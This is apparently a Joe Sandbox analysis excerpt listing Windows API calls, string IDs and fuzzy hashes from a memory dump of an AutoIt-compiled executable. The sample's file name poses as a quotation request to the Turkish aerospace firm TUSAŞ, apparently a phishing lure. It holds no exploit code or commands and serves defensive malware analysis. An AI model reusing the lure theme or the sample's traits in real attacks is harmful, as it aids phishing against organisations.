                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                                                                    • Instruction ID: a9662a08dcfd67055497935d93b8215c7e7ba5056ed95b67c277c4ba94e6c1e4
                                                                                                                                    • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                                                                    • Instruction Fuzzy Hash: 2FC1E93360515309EF6D4639C676A3EBAA1AE937B131A035DD4B3CB1C5EE20C978F660
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                                    • Instruction ID: 2ba69262dfbd7e423e4fd111d6a8d04fc8aeef342fabb155543453edc4f57627
                                                                                                                                    • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                                    • Instruction Fuzzy Hash: 14C1A93260515309EF2D4639C636A3EBBA17EA37B131A075DD4B3CB1C6EE20C979E650
                                                                                                                                    APIs
                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 0101785B
                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 0101786D
                                                                                                                                    • DestroyWindow.USER32 ref: 0101787B
                                                                                                                                    • GetDesktopWindow.USER32 ref: 01017895
                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 0101789C
                                                                                                                                    • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 010179DD
                                                                                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 010179ED
                                                                                                                                    • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01017A35
                                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 01017A41
                                                                                                                                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 01017A7B
                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01017A9D
                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01017AB0
                                                                                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01017ABB
                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 01017AC4
                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01017AD3
                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 01017ADC
                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01017AE3
                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 01017AEE
                                                                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01017B00
                                                                                                                                    • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,01032CAC,00000000), ref: 01017B16
                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 01017B26
                                                                                                                                    • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 01017B4C
                                                                                                                                    • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 01017B6B
                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01017B8D
                                                                                                                                    • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01017D7A
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                                    • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                    • API String ID: 2211948467-2373415609
                                                                                                                                    • Opcode ID: 6b23cf48c831c48b82e660c8c12ffb47ae0493a2cb83490cfd2ac4d412fd5e6b
                                                                                                                                    • Instruction ID: a87312f6c36c32f77fd99472d3a018c78e3475eda366d1fe6951e28d8b0a2ef5
                                                                                                                                    • Opcode Fuzzy Hash: 6b23cf48c831c48b82e660c8c12ffb47ae0493a2cb83490cfd2ac4d412fd5e6b
                                                                                                                                    • Instruction Fuzzy Hash: B002A27190010AEFDB24DFA8DC89EAE7BB9FF49350F148158F945AB294CB799D01CB60
                                                                                                                                    APIs
                                                                                                                                    • CharUpperBuffW.USER32(?,?,0102F910), ref: 01023627
                                                                                                                                    • IsWindowVisible.USER32(?), ref: 0102364B
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: BuffCharUpperVisibleWindow
                                                                                                                                    • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                                                                    • API String ID: 4105515805-45149045
                                                                                                                                    • Opcode ID: 4b4089e46acc32baaaaf442609e710805428635a06a4d9f89b42b531d56238f2
                                                                                                                                    • Instruction ID: 58043a03722bf4dccb7da8e57082d6d3e500b6956aff2dcf8ce744147b3d198a
                                                                                                                                    • Opcode Fuzzy Hash: 4b4089e46acc32baaaaf442609e710805428635a06a4d9f89b42b531d56238f2
                                                                                                                                    • Instruction Fuzzy Hash: DBD18B70208311CBCB14EF14C956A6EBBE5BF89384F044468F9C65F3A2CB2DE90ADB51
                                                                                                                                    APIs
                                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 0102A630
                                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 0102A661
                                                                                                                                    • GetSysColor.USER32(0000000F), ref: 0102A66D
                                                                                                                                    • SetBkColor.GDI32(?,000000FF), ref: 0102A687
                                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 0102A696
                                                                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 0102A6C1
                                                                                                                                    • GetSysColor.USER32(00000010), ref: 0102A6C9
                                                                                                                                    • CreateSolidBrush.GDI32(00000000), ref: 0102A6D0
                                                                                                                                    • FrameRect.USER32(?,?,00000000), ref: 0102A6DF
                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 0102A6E6
                                                                                                                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 0102A731
                                                                                                                                    • FillRect.USER32(?,?,00000000), ref: 0102A763
                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0102A78E
                                                                                                                                      • Part of subcall function 0102A8CA: GetSysColor.USER32(00000012), ref: 0102A903
                                                                                                                                      • Part of subcall function 0102A8CA: SetTextColor.GDI32(?,?), ref: 0102A907
                                                                                                                                      • Part of subcall function 0102A8CA: GetSysColorBrush.USER32(0000000F), ref: 0102A91D
                                                                                                                                      • Part of subcall function 0102A8CA: GetSysColor.USER32(0000000F), ref: 0102A928
                                                                                                                                      • Part of subcall function 0102A8CA: GetSysColor.USER32(00000011), ref: 0102A945
                                                                                                                                      • Part of subcall function 0102A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0102A953
                                                                                                                                      • Part of subcall function 0102A8CA: SelectObject.GDI32(?,00000000), ref: 0102A964
                                                                                                                                      • Part of subcall function 0102A8CA: SetBkColor.GDI32(?,00000000), ref: 0102A96D
                                                                                                                                      • Part of subcall function 0102A8CA: SelectObject.GDI32(?,?), ref: 0102A97A
                                                                                                                                      • Part of subcall function 0102A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 0102A999
                                                                                                                                      • Part of subcall function 0102A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0102A9B0
                                                                                                                                      • Part of subcall function 0102A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 0102A9C5
                                                                                                                                      • Part of subcall function 0102A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0102A9ED
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3521893082-0
                                                                                                                                    • Opcode ID: ac4ba8c4a903c493e8f728e01be71cc1a1a4f866a39facbf7530b322a7dc44f2
                                                                                                                                    • Instruction ID: 8c737bc2030b5fc58c2dd347ae1175eec8ccb5b7e262790d8215d70b42370d1d
                                                                                                                                    • Opcode Fuzzy Hash: ac4ba8c4a903c493e8f728e01be71cc1a1a4f866a39facbf7530b322a7dc44f2
                                                                                                                                    • Instruction Fuzzy Hash: 45918D72108312EFD7219F64DC08E5B7BF9FF89361F200A19FAA296194DB7AD844CB51
                                                                                                                                    APIs
                                                                                                                                    • DestroyWindow.USER32(?,?,?), ref: 00FA2CA2
                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00FA2CE8
                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00FA2CF3
                                                                                                                                    • DestroyIcon.USER32(00000000,?,?,?), ref: 00FA2CFE
                                                                                                                                    • DestroyWindow.USER32(00000000,?,?,?), ref: 00FA2D09
                                                                                                                                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 00FDC43B
                                                                                                                                    • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00FDC474
                                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00FDC89D
                                                                                                                                      • Part of subcall function 00FA1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00FA2036,?,00000000,?,?,?,?,00FA16CB,00000000,?), ref: 00FA1B9A
                                                                                                                                    • SendMessageW.USER32(?,00001053), ref: 00FDC8DA
                                                                                                                                    • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00FDC8F1
                                                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00FDC907
                                                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00FDC912
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                                                                                    • String ID: 0
                                                                                                                                    • API String ID: 464785882-4108050209
                                                                                                                                    • Opcode ID: e1b3287af43bb4c09e51b7deb3c3d0b87d260d1bb54fcfdf3dab86b3d627388a
                                                                                                                                    • Instruction ID: a8e471a248838c62af17c2d61602db85342fb17c389d3510f411a0cf66082228
                                                                                                                                    • Opcode Fuzzy Hash: e1b3287af43bb4c09e51b7deb3c3d0b87d260d1bb54fcfdf3dab86b3d627388a
                                                                                                                                    • Instruction Fuzzy Hash: E912A170A04202EFDB25CF28C884BA9B7E6FF05360F58456AF599CB652C735EC41EB91
                                                                                                                                    APIs
                                                                                                                                    • DestroyWindow.USER32(00000000), ref: 010174DE
                                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0101759D
                                                                                                                                    • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 010175DB
                                                                                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 010175ED
                                                                                                                                    • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 01017633
                                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 0101763F
                                                                                                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 01017683
                                                                                                                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 01017692
                                                                                                                                    • GetStockObject.GDI32(00000011), ref: 010176A2
                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 010176A6
                                                                                                                                    • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 010176B6
                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 010176BF
                                                                                                                                    • DeleteDC.GDI32(00000000), ref: 010176C8
                                                                                                                                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 010176F4
                                                                                                                                    • SendMessageW.USER32(00000030,00000000,00000001), ref: 0101770B
                                                                                                                                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 01017746
                                                                                                                                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0101775A
                                                                                                                                    • SendMessageW.USER32(00000404,00000001,00000000), ref: 0101776B
                                                                                                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0101779B
                                                                                                                                    • GetStockObject.GDI32(00000011), ref: 010177A6
                                                                                                                                    • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 010177B1
                                                                                                                                    • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 010177BB
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                    • API String ID: 2910397461-517079104
                                                                                                                                    • Opcode ID: 56aaafdb8da3378a90feb8eaf85fca2b94e3ddb20eaf91956cb3445fc2422bf5
                                                                                                                                    • Instruction ID: 6cb34f0b771f67f848a5c06ba3f605adb01256967813ea12ba58b39c069a1e6f
                                                                                                                                    • Opcode Fuzzy Hash: 56aaafdb8da3378a90feb8eaf85fca2b94e3ddb20eaf91956cb3445fc2422bf5
                                                                                                                                    • Instruction Fuzzy Hash: B6A161B1A40215BFEB24DFA5DC4AFAF7BB9EB05750F104114FA54A72D4C6B9AD00CB60
                                                                                                                                    APIs
                                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0100AD1E
                                                                                                                                    • GetDriveTypeW.KERNEL32(?,0102FAC0,?,\\.\,0102F910), ref: 0100ADFB
                                                                                                                                    • SetErrorMode.KERNEL32(00000000,0102FAC0,?,\\.\,0102F910), ref: 0100AF59
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorMode$DriveType
                                                                                                                                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                                    • API String ID: 2907320926-4222207086
                                                                                                                                    • Opcode ID: 4d837a12768b77749c54c72c8efe4701bac18815392801a709b10f77f6ae4954
                                                                                                                                    • Instruction ID: 864c54e0a49c3975ec1016b066bcf527df8792c2f00ec3966785f876e712cfeb
                                                                                                                                    • Opcode Fuzzy Hash: 4d837a12768b77749c54c72c8efe4701bac18815392801a709b10f77f6ae4954
                                                                                                                                    • Instruction Fuzzy Hash: 9F51AFF0748305EBAB92EBA6C942DBE77A5EB09600F10805FECC7AB2D1D6719901DB51
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __wcsnicmp
                                                                                                                                    • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                                    • API String ID: 1038674560-86951937
                                                                                                                                    • Opcode ID: 34ccf3f53106101c734c6daa6ed52ccbe84cb2183371b48a276d8d495dfb342d
                                                                                                                                    • Instruction ID: d496460b49ef8662753a36e787541dac6167fe7eba0994cc937c6eeca6c3fba5
                                                                                                                                    • Opcode Fuzzy Hash: 34ccf3f53106101c734c6daa6ed52ccbe84cb2183371b48a276d8d495dfb342d
                                                                                                                                    • Instruction Fuzzy Hash: 668119F1640206AACB11BB21EC43FBF3769AF16750F084029F945EE192EB68DE45F651
                                                                                                                                    APIs
                                                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 01029AD2
                                                                                                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 01029B8B
                                                                                                                                    • SendMessageW.USER32(?,00001102,00000002,?), ref: 01029BA7
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$Window
                                                                                                                                    • String ID: 0
                                                                                                                                    • API String ID: 2326795674-4108050209
                                                                                                                                    • Opcode ID: 14b37537234b61af0458856baf26d59e8b9ffda7747466548c110c1ae1c0de21
                                                                                                                                    • Instruction ID: d072f32c2cbe6148e33ed06d392708ad07457dad0e097caf19ac239a2410906a
                                                                                                                                    • Opcode Fuzzy Hash: 14b37537234b61af0458856baf26d59e8b9ffda7747466548c110c1ae1c0de21
                                                                                                                                    • Instruction Fuzzy Hash: 6502E030104321AFEBA58F28C848FAABFE5FF49358F04455DFAD9962A1C779D844CB91
                                                                                                                                    APIs
                                                                                                                                    • GetSysColor.USER32(00000012), ref: 0102A903
                                                                                                                                    • SetTextColor.GDI32(?,?), ref: 0102A907
                                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 0102A91D
                                                                                                                                    • GetSysColor.USER32(0000000F), ref: 0102A928
                                                                                                                                    • CreateSolidBrush.GDI32(?), ref: 0102A92D
                                                                                                                                    • GetSysColor.USER32(00000011), ref: 0102A945
                                                                                                                                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0102A953
                                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 0102A964
                                                                                                                                    • SetBkColor.GDI32(?,00000000), ref: 0102A96D
                                                                                                                                    • SelectObject.GDI32(?,?), ref: 0102A97A
                                                                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 0102A999
                                                                                                                                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0102A9B0
                                                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0102A9C5
                                                                                                                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0102A9ED
                                                                                                                                    • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0102AA14
                                                                                                                                    • InflateRect.USER32(?,000000FD,000000FD), ref: 0102AA32
                                                                                                                                    • DrawFocusRect.USER32(?,?), ref: 0102AA3D
                                                                                                                                    • GetSysColor.USER32(00000011), ref: 0102AA4B
                                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 0102AA53
                                                                                                                                    • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0102AA67
                                                                                                                                    • SelectObject.GDI32(?,0102A5FA), ref: 0102AA7E
                                                                                                                                    • DeleteObject.GDI32(?), ref: 0102AA89
                                                                                                                                    • SelectObject.GDI32(?,?), ref: 0102AA8F
                                                                                                                                    • DeleteObject.GDI32(?), ref: 0102AA94
                                                                                                                                    • SetTextColor.GDI32(?,?), ref: 0102AA9A
                                                                                                                                    • SetBkColor.GDI32(?,?), ref: 0102AAA4
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
